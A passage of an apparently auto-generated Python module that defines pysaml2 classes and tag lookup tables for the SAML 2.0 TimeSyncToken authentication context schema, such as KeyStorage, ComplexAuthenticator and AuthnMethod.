'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeyStorage'] = (
'key_storage', KeyStorage)
c_cardinality['key_storage'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeySharing'] = (
'key_sharing', KeySharing)
c_cardinality['key_sharing'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(
['key_activation', 'key_storage', 'key_sharing', 'extension'])
def __init__(self,
key_activation=None,
key_storage=None,
key_sharing=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.key_activation = key_activation
self.key_storage = key_storage
self.key_sharing = key_sharing
self.extension = extension or []
def private_key_protection_type__from_string(xml_string):
return saml2.create_class_from_xml_string(PrivateKeyProtectionType_,
xml_string)
class SecretKeyProtectionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SecretKeyProtectionType element """
c_tag = 'SecretKeyProtectionType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeyActivation'] = (
'key_activation', KeyActivation)
c_cardinality['key_activation'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeyStorage'] = (
'key_storage', KeyStorage)
c_cardinality['key_storage'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(['key_activation', 'key_storage', 'extension'])
def __init__(self,
key_activation=None,
key_storage=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.key_activation = key_activation
self.key_storage = key_storage
self.extension = extension or []
def secret_key_protection_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SecretKeyProtectionType_,
xml_string)
class SecretKeyProtection(SecretKeyProtectionType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SecretKeyProtection element """
c_tag = 'SecretKeyProtection'
c_namespace = NAMESPACE
c_children = SecretKeyProtectionType_.c_children.copy()
c_attributes = SecretKeyProtectionType_.c_attributes.copy()
c_child_order = SecretKeyProtectionType_.c_child_order[:]
c_cardinality = SecretKeyProtectionType_.c_cardinality.copy()
def secret_key_protection_from_string(xml_string):
return saml2.create_class_from_xml_string(SecretKeyProtection, xml_string)
class PrivateKeyProtection(PrivateKeyProtectionType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PrivateKeyProtection element """
c_tag = 'PrivateKeyProtection'
c_namespace = NAMESPACE
c_children = PrivateKeyProtectionType_.c_children.copy()
c_attributes = PrivateKeyProtectionType_.c_attributes.copy()
c_child_order = PrivateKeyProtectionType_.c_child_order[:]
c_cardinality = PrivateKeyProtectionType_.c_cardinality.copy()
def private_key_protection_from_string(xml_string):
return saml2.create_class_from_xml_string(PrivateKeyProtection, xml_string)
class TechnicalProtectionBaseType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:TechnicalProtectionBaseType element """
c_tag = 'TechnicalProtectionBaseType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PrivateKeyProtection'] = (
'private_key_protection', PrivateKeyProtection)
c_cardinality['private_key_protection'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SecretKeyProtection'] = (
'secret_key_protection', SecretKeyProtection)
c_cardinality['secret_key_protection'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(
['private_key_protection', 'secret_key_protection', 'extension'])
def __init__(self,
private_key_protection=None,
secret_key_protection=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.private_key_protection = private_key_protection
self.secret_key_protection = secret_key_protection
self.extension = extension or []
def technical_protection_base_type__from_string(xml_string):
return saml2.create_class_from_xml_string(TechnicalProtectionBaseType_,
xml_string)
class TechnicalProtection(TechnicalProtectionBaseType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:TechnicalProtection element """
c_tag = 'TechnicalProtection'
c_namespace = NAMESPACE
c_children = TechnicalProtectionBaseType_.c_children.copy()
c_attributes = TechnicalProtectionBaseType_.c_attributes.copy()
c_child_order = TechnicalProtectionBaseType_.c_child_order[:]
c_cardinality = TechnicalProtectionBaseType_.c_cardinality.copy()
def technical_protection_from_string(xml_string):
return saml2.create_class_from_xml_string(TechnicalProtection, xml_string)
#..................
# ['ComplexAuthenticator', 'Authenticator', 'AuthnMethod', 'ComplexAuthenticatorType', 'AuthenticatorBaseType', 'AuthnContextDeclarationBaseType', 'AuthnMethodBaseType', 'AuthenticationContextDeclaration']
class ComplexAuthenticatorType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ComplexAuthenticatorType element """
c_tag = 'ComplexAuthenticatorType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PreviousSession'] = (
'previous_session', PreviousSession)
c_cardinality['previous_session'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ResumeSession'] = (
'resume_session', ResumeSession)
c_cardinality['resume_session'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}DigSig'] = (
'dig_sig', DigSig)
c_cardinality['dig_sig'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Password'] = (
'password', Password)
c_cardinality['password'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}RestrictedPassword'] = (
'restricted_password', RestrictedPassword)
c_cardinality['restricted_password'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ZeroKnowledge'] = (
'zero_knowledge', ZeroKnowledge)
c_cardinality['zero_knowledge'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SharedSecretChallengeResponse'] = (
'shared_secret_challenge_response', SharedSecretChallengeResponse)
c_cardinality['shared_secret_challenge_response'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SharedSecretDynamicPlaintext'] = (
'shared_secret_dynamic_plaintext', SharedSecretDynamicPlaintext)
c_cardinality['shared_secret_dynamic_plaintext'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}IPAddress'] = (
'ip_address', IPAddress)
c_cardinality['ip_address'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AsymmetricDecryption'] = (
'asymmetric_decryption', AsymmetricDecryption)
c_cardinality['asymmetric_decryption'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AsymmetricKeyAgreement'] = (
'asymmetric_key_agreement', AsymmetricKeyAgreement)
c_cardinality['asymmetric_key_agreement'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SubscriberLineNumber'] = (
'subscriber_line_number', SubscriberLineNumber)
c_cardinality['subscriber_line_number'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}UserSuffix'] = (
'user_suffix', UserSuffix)
c_cardinality['user_suffix'] = {"min": 0, "max": 1}
c_cardinality['complex_authenticator'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(
['previous_session', 'resume_session', 'dig_sig', 'password',
'restricted_password', 'zero_knowledge',
'shared_secret_challenge_response', 'shared_secret_dynamic_plaintext',
'ip_address', 'asymmetric_decryption', 'asymmetric_key_agreement',
'subscriber_line_number', 'user_suffix', 'complex_authenticator',
'extension'])
def __init__(self,
previous_session=None,
resume_session=None,
dig_sig=None,
password=None,
restricted_password=None,
zero_knowledge=None,
shared_secret_challenge_response=None,
shared_secret_dynamic_plaintext=None,
ip_address=None,
asymmetric_decryption=None,
asymmetric_key_agreement=None,
subscriber_line_number=None,
user_suffix=None,
complex_authenticator=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.previous_session = previous_session
self.resume_session = resume_session
self.dig_sig = dig_sig
self.password = password
self.restricted_password = restricted_password
self.zero_knowledge = zero_knowledge
self.shared_secret_challenge_response = shared_secret_challenge_response
self.shared_secret_dynamic_plaintext = shared_secret_dynamic_plaintext
self.ip_address = ip_address
self.asymmetric_decryption = asymmetric_decryption
self.asymmetric_key_agreement = asymmetric_key_agreement
self.subscriber_line_number = subscriber_line_number
self.user_suffix = user_suffix
self.complex_authenticator = complex_authenticator
self.extension = extension or []
def complex_authenticator_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ComplexAuthenticatorType_,
xml_string)
class ComplexAuthenticator(ComplexAuthenticatorType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ComplexAuthenticator element """
c_tag = 'ComplexAuthenticator'
c_namespace = NAMESPACE
c_children = ComplexAuthenticatorType_.c_children.copy()
c_attributes = ComplexAuthenticatorType_.c_attributes.copy()
c_child_order = ComplexAuthenticatorType_.c_child_order[:]
c_cardinality = ComplexAuthenticatorType_.c_cardinality.copy()
def complex_authenticator_from_string(xml_string):
return saml2.create_class_from_xml_string(ComplexAuthenticator, xml_string)
class AuthenticatorBaseType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthenticatorBaseType element """
c_tag = 'AuthenticatorBaseType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PreviousSession'] = (
'previous_session', PreviousSession)
c_cardinality['previous_session'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ResumeSession'] = (
'resume_session', ResumeSession)
c_cardinality['resume_session'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}DigSig'] = (
'dig_sig', DigSig)
c_cardinality['dig_sig'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Password'] = (
'password', Password)
c_cardinality['password'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}RestrictedPassword'] = (
'restricted_password', RestrictedPassword)
c_cardinality['restricted_password'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ZeroKnowledge'] = (
'zero_knowledge', ZeroKnowledge)
c_cardinality['zero_knowledge'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SharedSecretChallengeResponse'] = (
'shared_secret_challenge_response', SharedSecretChallengeResponse)
c_cardinality['shared_secret_challenge_response'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SharedSecretDynamicPlaintext'] = (
'shared_secret_dynamic_plaintext', SharedSecretDynamicPlaintext)
c_cardinality['shared_secret_dynamic_plaintext'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}IPAddress'] = (
'ip_address', IPAddress)
c_cardinality['ip_address'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AsymmetricDecryption'] = (
'asymmetric_decryption', AsymmetricDecryption)
c_cardinality['asymmetric_decryption'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AsymmetricKeyAgreement'] = (
'asymmetric_key_agreement', AsymmetricKeyAgreement)
c_cardinality['asymmetric_key_agreement'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SubscriberLineNumber'] = (
'subscriber_line_number', SubscriberLineNumber)
c_cardinality['subscriber_line_number'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}UserSuffix'] = (
'user_suffix', UserSuffix)
c_cardinality['user_suffix'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ComplexAuthenticator'] = (
'complex_authenticator', ComplexAuthenticator)
c_cardinality['complex_authenticator'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(
['previous_session', 'resume_session', 'dig_sig', 'password',
'restricted_password', 'zero_knowledge',
'shared_secret_challenge_response', 'shared_secret_dynamic_plaintext',
'ip_address', 'asymmetric_decryption', 'asymmetric_key_agreement',
'subscriber_line_number', 'user_suffix', 'complex_authenticator',
'extension'])
def __init__(self,
previous_session=None,
resume_session=None,
dig_sig=None,
password=None,
restricted_password=None,
zero_knowledge=None,
shared_secret_challenge_response=None,
shared_secret_dynamic_plaintext=None,
ip_address=None,
asymmetric_decryption=None,
asymmetric_key_agreement=None,
subscriber_line_number=None,
user_suffix=None,
complex_authenticator=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.previous_session = previous_session
self.resume_session = resume_session
self.dig_sig = dig_sig
self.password = password
self.restricted_password = restricted_password
self.zero_knowledge = zero_knowledge
self.shared_secret_challenge_response = shared_secret_challenge_response
self.shared_secret_dynamic_plaintext = shared_secret_dynamic_plaintext
self.ip_address = ip_address
self.asymmetric_decryption = asymmetric_decryption
self.asymmetric_key_agreement = asymmetric_key_agreement
self.subscriber_line_number = subscriber_line_number
self.user_suffix = user_suffix
self.complex_authenticator = complex_authenticator
self.extension = extension or []
def authenticator_base_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthenticatorBaseType_,
xml_string)
class Authenticator(AuthenticatorBaseType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Authenticator element """
c_tag = 'Authenticator'
c_namespace = NAMESPACE
c_children = AuthenticatorBaseType_.c_children.copy()
c_attributes = AuthenticatorBaseType_.c_attributes.copy()
c_child_order = AuthenticatorBaseType_.c_child_order[:]
c_cardinality = AuthenticatorBaseType_.c_cardinality.copy()
def authenticator_from_string(xml_string):
return saml2.create_class_from_xml_string(Authenticator, xml_string)
class AuthnMethodBaseType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthnMethodBaseType element """
c_tag = 'AuthnMethodBaseType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PrincipalAuthenticationMechanism'] = (
'principal_authentication_mechanism', PrincipalAuthenticationMechanism)
c_cardinality['principal_authentication_mechanism'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Authenticator'] = (
'authenticator', Authenticator)
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AuthenticatorTransportProtocol'] = (
'authenticator_transport_protocol', AuthenticatorTransportProtocol)
c_cardinality['authenticator_transport_protocol'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(['principal_authentication_mechanism', 'authenticator',
'authenticator_transport_protocol', 'extension'])
def __init__(self,
principal_authentication_mechanism=None,
authenticator=None,
authenticator_transport_protocol=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.principal_authentication_mechanism = principal_authentication_mechanism
self.authenticator = authenticator
self.authenticator_transport_protocol = authenticator_transport_protocol
self.extension = extension or []
def authn_method_base_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnMethodBaseType_, xml_string)
class AuthnMethod(AuthnMethodBaseType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthnMethod element """
c_tag = 'AuthnMethod'
c_namespace = NAMESPACE
c_children = AuthnMethodBaseType_.c_children.copy()
c_attributes = AuthnMethodBaseType_.c_attributes.copy()
c_child_order = AuthnMethodBaseType_.c_child_order[:]
c_cardinality = AuthnMethodBaseType_.c_cardinality.copy()
def authn_method_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnMethod, xml_string)
class AuthnContextDeclarationBaseType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthnContextDeclarationBaseType element """
c_tag = 'AuthnContextDeclarationBaseType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Identification'] = (
'identification', Identification)
c_cardinality['identification'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}TechnicalProtection'] = (
'technical_protection', TechnicalProtection)
c_cardinality['technical_protection'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}OperationalProtection'] = (
'operational_protection', OperationalProtection)
c_cardinality['operational_protection'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AuthnMethod'] = (
'authn_method', AuthnMethod)
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}GoverningAgreements'] = (
'governing_agreements', GoverningAgreements)
c_cardinality['governing_agreements'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_attributes['ID'] = ('id', 'ID', False)
c_child_order.extend(
['identification', 'technical_protection', 'operational_protection',
'authn_method', 'governing_agreements', 'extension'])
def __init__(self,
identification=None,
technical_protection=None,
operational_protection=None,
authn_method=None,
governing_agreements=None,
extension=None,
id=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.identification = identification
self.technical_protection = technical_protection
self.operational_protection = operational_protection
self.authn_method = authn_method
self.governing_agreements = governing_agreements
self.extension = extension or []
self.id = id
def authn_context_declaration_base_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextDeclarationBaseType_,
xml_string)
class AuthenticationContextDeclaration(AuthnContextDeclarationBaseType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthenticationContextDeclaration element """
c_tag = 'AuthenticationContextDeclaration'
c_namespace = NAMESPACE
c_children = AuthnContextDeclarationBaseType_.c_children.copy()
c_attributes = AuthnContextDeclarationBaseType_.c_attributes.copy()
c_child_order = AuthnContextDeclarationBaseType_.c_child_order[:]
c_cardinality = AuthnContextDeclarationBaseType_.c_cardinality.copy()
def authentication_context_declaration_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthenticationContextDeclaration,
xml_string)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ComplexAuthenticatorType_.c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ComplexAuthenticator'] = (
'complex_authenticator', ComplexAuthenticator)
ComplexAuthenticator.c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ComplexAuthenticator'] = (
'complex_authenticator', ComplexAuthenticator)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ELEMENT_FROM_STRING = {
AuthenticationContextDeclaration.c_tag: authentication_context_declaration_from_string,
Identification.c_tag: identification_from_string,
PhysicalVerification.c_tag: physical_verification_from_string,
WrittenConsent.c_tag: written_consent_from_string,
TechnicalProtection.c_tag: technical_protection_from_string,
SecretKeyProtection.c_tag: secret_key_protection_from_string,
PrivateKeyProtection.c_tag: private_key_protection_from_string,
KeyActivation.c_tag: key_activation_from_string,
KeySharing.c_tag: key_sharing_from_string,
KeyStorage.c_tag: key_storage_from_string,
SubscriberLineNumber.c_tag: subscriber_line_number_from_string,
UserSuffix.c_tag: user_suffix_from_string,
Password.c_tag: password_from_string,
ActivationPin.c_tag: activation_pin_from_string,
Token.c_tag: token_from_string,
TimeSyncToken.c_tag: time_sync_token_from_string,
Smartcard.c_tag: smartcard_from_string,
Length.c_tag: length_from_string,
ActivationLimit.c_tag: activation_limit_from_string,
Generation.c_tag: generation_from_string,
AuthnMethod.c_tag: authn_method_from_string,
PrincipalAuthenticationMechanism.c_tag: principal_authentication_mechanism_from_string,
Authenticator.c_tag: authenticator_from_string,
ComplexAuthenticator.c_tag: complex_authenticator_from_string,
PreviousSession.c_tag: previous_session_from_string,
ResumeSession.c_tag: resume_session_from_string,
ZeroKnowledge.c_tag: zero_knowledge_from_string,
SharedSecretChallengeResponse.c_tag: shared_secret_challenge_response_from_string,
SharedSecretChallengeResponseType_.c_tag: shared_secret_challenge_response_type__from_string,
DigSig.c_tag: dig_sig_from_string,
AsymmetricDecryption.c_tag: asymmetric_decryption_from_string,
AsymmetricKeyAgreement.c_tag: asymmetric_key_agreement_from_string,
PublicKeyType_.c_tag: public_key_type__from_string,
IPAddress.c_tag: ip_address_from_string,
SharedSecretDynamicPlaintext.c_tag: shared_secret_dynamic_plaintext_from_string,
AuthenticatorTransportProtocol.c_tag: authenticator_transport_protocol_from_string,
HTTP.c_tag: http_from_string,
IPSec.c_tag: ip_sec_from_string,
WTLS.c_tag: wtls_from_string,
MobileNetworkNoEncryption.c_tag: mobile_network_no_encryption_from_string,
MobileNetworkRadioEncryption.c_tag: mobile_network_radio_encryption_from_string,
MobileNetworkEndToEndEncryption.c_tag: mobile_network_end_to_end_encryption_from_string,
SSL.c_tag: ssl_from_string,
PSTN.c_tag: pstn_from_string,
ISDN.c_tag: isdn_from_string,
ADSL.c_tag: adsl_from_string,
OperationalProtection.c_tag: operational_protection_from_string,
SecurityAudit.c_tag: security_audit_from_string,
SwitchAudit.c_tag: switch_audit_from_string,
DeactivationCallCenter.c_tag: deactivation_call_center_from_string,
GoverningAgreements.c_tag: governing_agreements_from_string,
GoverningAgreementRef.c_tag: governing_agreement_ref_from_string,
NymType_.c_tag: nym_type__from_string,
IdentificationType_.c_tag: identification_type__from_string,
TechnicalProtectionBaseType_.c_tag: technical_protection_base_type__from_string,
OperationalProtectionType_.c_tag: operational_protection_type__from_string,
GoverningAgreementsType_.c_tag: governing_agreements_type__from_string,
GoverningAgreementRefType_.c_tag: governing_agreement_ref_type__from_string,
AuthenticatorBaseType_.c_tag: authenticator_base_type__from_string,
ComplexAuthenticatorType_.c_tag: complex_authenticator_type__from_string,
AuthenticatorTransportProtocolType_.c_tag: authenticator_transport_protocol_type__from_string,
KeyActivationType_.c_tag: key_activation_type__from_string,
KeySharingType_.c_tag: key_sharing_type__from_string,
PrivateKeyProtectionType_.c_tag: private_key_protection_type__from_string,
PasswordType_.c_tag: password_type__from_string,
RestrictedPassword.c_tag: restricted_password_from_string,
RestrictedPasswordType_.c_tag: restricted_password_type__from_string,
RestrictedLengthType_.c_tag: restricted_length_type__from_string,
ActivationPinType_.c_tag: activation_pin_type__from_string,
Alphabet.c_tag: alphabet_from_string,
AlphabetType_.c_tag: alphabet_type__from_string,
DeviceTypeType_.c_tag: device_type_type__from_string,
BooleanType_.c_tag: boolean_type__from_string,
ActivationLimitType_.c_tag: activation_limit_type__from_string,
ActivationLimitDuration.c_tag: activation_limit_duration_from_string,
ActivationLimitUsages.c_tag: activation_limit_usages_from_string,
ActivationLimitSession.c_tag: activation_limit_session_from_string,
ActivationLimitDurationType_.c_tag: activation_limit_duration_type__from_string,
ActivationLimitUsagesType_.c_tag: activation_limit_usages_type__from_string,
ActivationLimitSessionType_.c_tag: activation_limit_session_type__from_string,
LengthType_.c_tag: length_type__from_string,
MediumType_.c_tag: medium_type__from_string,
KeyStorageType_.c_tag: key_storage_type__from_string,
SecretKeyProtectionType_.c_tag: secret_key_protection_type__from_string,
SecurityAuditType_.c_tag: security_audit_type__from_string,
ExtensionOnlyType_.c_tag: extension_only_type__from_string,
Extension.c_tag: extension_from_string,
ExtensionType_.c_tag: extension_type__from_string,
AuthnContextDeclarationBaseType_.c_tag: authn_context_declaration_base_type__from_string,
AuthnMethodBaseType_.c_tag: authn_method_base_type__from_string,
PrincipalAuthenticationMechanismType_.c_tag: principal_authentication_mechanism_type__from_string,
TokenType_.c_tag: token_type__from_string,
TimeSyncTokenType_.c_tag: time_sync_token_type__from_string,
}
ELEMENT_BY_TAG = {
'AuthenticationContextDeclaration': AuthenticationContextDeclaration,
'Identification': Identification,
'PhysicalVerification': PhysicalVerification,
'WrittenConsent': WrittenConsent,
'TechnicalProtection': TechnicalProtection,
'SecretKeyProtection': SecretKeyProtection,
'PrivateKeyProtection': PrivateKeyProtection,
'KeyActivation': KeyActivation,
'KeySharing': KeySharing,
'KeyStorage': KeyStorage,
'SubscriberLineNumber': SubscriberLineNumber,
'UserSuffix': UserSuffix,
'Password': Password,
'ActivationPin': ActivationPin,
'Token': Token,
'TimeSyncToken': TimeSyncToken,
'Smartcard': Smartcard,
'Length': Length,
'ActivationLimit': ActivationLimit,
'Generation': Generation,
'AuthnMethod': AuthnMethod,
'PrincipalAuthenticationMechanism': PrincipalAuthenticationMechanism,
'Authenticator': Authenticator,
'ComplexAuthenticator': ComplexAuthenticator,
'PreviousSession': PreviousSession,
'ResumeSession': ResumeSession,
'ZeroKnowledge': ZeroKnowledge,
'SharedSecretChallengeResponse': SharedSecretChallengeResponse,
'SharedSecretChallengeResponseType': SharedSecretChallengeResponseType_,
'DigSig': DigSig,
'AsymmetricDecryption': AsymmetricDecryption,
'AsymmetricKeyAgreement': AsymmetricKeyAgreement,
'PublicKeyType': PublicKeyType_,
'IPAddress': IPAddress,
'SharedSecretDynamicPlaintext': SharedSecretDynamicPlaintext,
'AuthenticatorTransportProtocol': AuthenticatorTransportProtocol,
'HTTP': HTTP,
'IPSec': IPSec,
'WTLS': WTLS,
'MobileNetworkNoEncryption': MobileNetworkNoEncryption,
'MobileNetworkRadioEncryption': MobileNetworkRadioEncryption,
'MobileNetworkEndToEndEncryption': MobileNetworkEndToEndEncryption,
'SSL': SSL,
'PSTN': PSTN,
'ISDN': ISDN,
'ADSL': ADSL,
'OperationalProtection': OperationalProtection,
'SecurityAudit': SecurityAudit,
'SwitchAudit': SwitchAudit,
'DeactivationCallCenter': DeactivationCallCenter,
'GoverningAgreements': GoverningAgreements,
'GoverningAgreementRef': GoverningAgreementRef,
'nymType': NymType_,
'IdentificationType': IdentificationType_,
'TechnicalProtectionBaseType': TechnicalProtectionBaseType_,
'OperationalProtectionType': OperationalProtectionType_,
'GoverningAgreementsType': GoverningAgreementsType_,
'GoverningAgreementRefType': GoverningAgreementRefType_,
'AuthenticatorBaseType': AuthenticatorBaseType_,
'ComplexAuthenticatorType': ComplexAuthenticatorType_,
'AuthenticatorTransportProtocolType': AuthenticatorTransportProtocolType_,
'KeyActivationType': KeyActivationType_,
'KeySharingType': KeySharingType_,
'PrivateKeyProtectionType': PrivateKeyProtectionType_,
'PasswordType': PasswordType_,
'RestrictedPassword': RestrictedPassword,
'RestrictedPasswordType': RestrictedPasswordType_,
'RestrictedLengthType': RestrictedLengthType_,
